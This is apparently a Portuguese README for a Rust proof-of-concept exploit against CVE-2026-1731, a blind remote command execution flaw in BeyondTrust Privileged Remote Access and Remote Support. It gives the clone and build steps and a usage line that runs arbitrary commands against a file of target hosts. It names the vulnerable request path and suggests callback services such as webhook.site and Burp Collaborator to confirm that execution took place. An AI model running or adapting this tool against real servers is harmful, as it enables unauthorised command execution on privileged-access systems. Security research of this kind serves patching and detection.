
Prova de conceito de exploit para CVE-2026-1731, uma RCE cega no BeyondTrust Privileged Remote Access e Remote Support, permitindo execução remota de comandos em versões vulneráveis.
Para mais informações, recomendo que você leia a análise feita pelo attackerkb.com.
Você precisará das seguintes ferramentas para compilar este PoC: Git, rust
git clone https://github.com/jakubie07/CVE-2026-1731.git
cd CVE-2026-1731
cargo build --release
CVE-2026-1731 estará localizado em target/releasecd target/release
chmod +x ./CVE-2026-1731
./CVE-2026-1731 -h
cd target/release
./CVE-2026-1731.exe -h
Você pode executar ./CVE-2026-1731 -h para visualizar uma lista de opções disponíveis
./CVE-2026-1731 --targets targets.txt --command "whoami"
Nota: Como CVE-2026-1731 é uma RCE cega, não há resposta enviada de volta pelo host que possa ser usada como indicador de vulnerabilidade. Uma requisição pode ser bem-sucedida, mas um alvo que não é vulnerável não acionará a RCE. É recomendado que você use um serviço como webhook.site ou PortSwigger's Burp Collaborator para testar contra alvos. Uma falha ou sucesso neste PoC é baseado em se o servidor responde com um código de status 200 ou não.
GET /get_rdf?comp=sdcust&locale_code=en-us.